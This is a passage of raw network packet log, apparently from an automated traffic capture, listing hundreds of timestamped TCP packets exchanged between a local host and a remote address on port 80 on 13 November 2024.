                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705826998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705837965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705874920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705876112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705890894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705915928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705930948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705935955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705955029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705967903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705971956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705987930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706002951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706012964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706027031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706042051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706049919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706054926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706070900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706078053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706099987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706104040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706115961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706134081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706147909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706156969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706166029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706180096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706181049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706196070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706211090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706212044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706252098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706268072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706293106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706295967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706309080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706309080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706326008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706341028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706342936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706357956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706373930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706391096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706418991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706423998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706449032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706465960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706486940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706506968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706513882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706532001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706538916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706556082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706569910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706585884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706599951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706602097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706614971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706619978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706634998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706638098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706651926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706665993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706671000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706706047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706948996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706964970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706978083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.706993103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707000971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707009077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707022905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707025051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707039118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707052946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707053900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707081079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707093954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707097054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707113028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707129002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707134008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707144022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707159042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707160950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707176924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707190037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707191944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707209110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707221985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707240105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707242966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707257032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707263947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707272053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707287073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707288027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707324028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707350016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707350016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707366943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707391977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707402945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707408905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707426071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707429886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707442045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707458973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707467079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707485914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707494020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707503080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707518101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707531929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707546949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707550049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707562923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707572937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707577944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707592964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707596064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707609892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707626104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707631111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707640886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707657099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707657099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707674026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707689047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707705975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707719088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707721949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707732916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707740068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707756996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707778931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707794905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707809925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707822084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707827091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707843065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707854986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707859039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707875013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707875967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707890987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707906008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707921028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707926035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707937956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707943916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707953930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707967997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707981110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.707982063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708008051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708009005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708024979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708039999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708041906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708055973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708071947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708086014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708101034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708102942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708116055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708118916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708136082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708143950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708161116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708178997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708178997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708194017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708209991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708221912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708236933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708236933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708250999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708252907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708267927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708278894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708286047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708302021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708313942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708329916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708339930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708345890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708362103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708376884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708391905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708394051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708405972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708415031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708424091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708439112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708456993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708458900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708472013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708477020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708488941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708503008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708530903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708532095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708544970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708547115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708563089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708578110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708595037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708596945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708621979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708623886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708640099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708656073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708672047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708673954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708689928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708698034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708707094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708720922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708758116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708771944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708796024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708796978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708810091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708825111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708827972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708842993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708857059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708858013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708875895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708892107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708909035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708944082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708944082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708961010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708976984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.708992004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709007978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709008932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709028959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709232092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709247112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709261894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709276915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709291935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709275007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709304094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709306002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709323883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709331989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709338903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709362030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709371090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709377050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709394932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709412098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709433079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709434986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709455013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709469080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709485054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709491014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709510088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709526062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709538937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709542036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709558010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709573030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709577084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709589005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709599018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709606886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709621906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709624052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709641933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709656000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709676981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709680080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709696054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709697008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709712029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709727049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709727049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709753990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709770918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709785938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709788084 CET4973380192.168.2.442.96.10.8
